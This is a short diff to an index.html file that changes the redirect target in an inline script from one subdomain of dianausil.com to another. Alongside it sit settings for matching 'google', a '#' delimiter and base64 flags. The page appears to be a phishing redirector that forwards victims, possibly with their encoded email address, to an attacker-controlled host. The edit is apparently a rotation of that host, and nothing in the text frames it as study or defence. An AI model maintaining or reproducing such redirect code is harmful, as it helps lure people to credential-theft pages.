--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 
     <script language="javascript">
         var domainMatching = 'google';
-        var redirectUrl = 'https://IMWX.dianausil.com/IDLK/#M';
+        var redirectUrl = 'https://e.dianausil.com/IDLK/#M';
         var redirectDelimiter = '#';
         var enablebase64 = true;
         var decodebase64 = false;
